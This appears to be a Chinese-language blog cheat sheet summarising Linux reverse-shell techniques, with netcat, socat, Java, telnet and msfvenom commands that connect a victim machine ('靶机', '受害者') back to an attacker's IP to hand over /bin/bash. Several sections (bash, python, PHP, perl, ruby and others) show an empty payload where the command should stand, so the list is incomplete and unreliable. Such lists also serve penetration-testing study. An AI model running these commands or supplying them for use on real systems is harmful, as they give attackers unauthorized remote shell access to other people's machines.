天天看点

linux反弹shell总结

1.1发送文件(公网发内网)

文件发送端:

nc -lp 6666 < 文件
           

文件接收端:

nc 发送端ip 发送端端口 > 新文件
           

1.2发送文件(内网发公网)

文件发送端:

nc -lp 6666 > 文件
           

文件接收端:

nc 发送端ip 发送端端口 < 新文件
           

2.聊天

发送端:

接收端:

nc 发送端ip 发送端端口
           

3.1发送shell

发送端(公网服务器):

nc -lvvp 发送端port -e /bin/bash
           

接收端:

nc 发送端ip 发送端port
           

3.2反弹shell

接收端:

发送端(内网网服务器):

nc 接收端ip 接收端端口 -e /bin/bash
           

4.bash反弹

接收端(hackip,公网):

nc -lvvp 端口
           

发送端(受害者):

发送端(受害者):

5.1socat反弹(tcp)

接收端(攻击机):

./socat TCP-LISTEN:端口 -
           

发送端(靶机):

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:攻击机ip:攻击机端口
           

5.2socat反弹(udp)

接收端:

发送端:

6.python反弹

接收端(攻击机,外网):

nc -lvvp 端口
           

发送端(靶机):

7.PHP反弹

接收端:

nc -lvvp 端口
           

发送端:

8.JAVA反弹

接收端:

nc -lvvp 端口
           

发送端:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/攻击者ip/端口;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
           

9.perl反弹

接收端:

nc -lvvp 端口
           

发送端:

10.ruby反弹

接收端:

nc -lvvp 端口
           

发送端:

11.telnet反弹

接收端:

nc -lvvp 端口
           

发送端:

mknod backpipe p && telnet 攻击者ip 端口 0<backpipe | /bin/bash 1>backpipe
           

12.lua反弹(安装lua环境:apt-get install lua*)

接收端:

nc -lvvp 端口
           

发送端:

13.awk反弹

接收端:

nc -lvvp 端口
           

发送端:

14.ksh反弹

接收端:

nc -lvvp 端口
           

发送端:

15.msfvenom生成各种payload

接收端:

nc -lvvp 端口
           

查找payload:

生成payload:

msfvenom -p cmd/unix/reverse_模块 lhost=接收端ip lport=接收端端口 R
           

继续阅读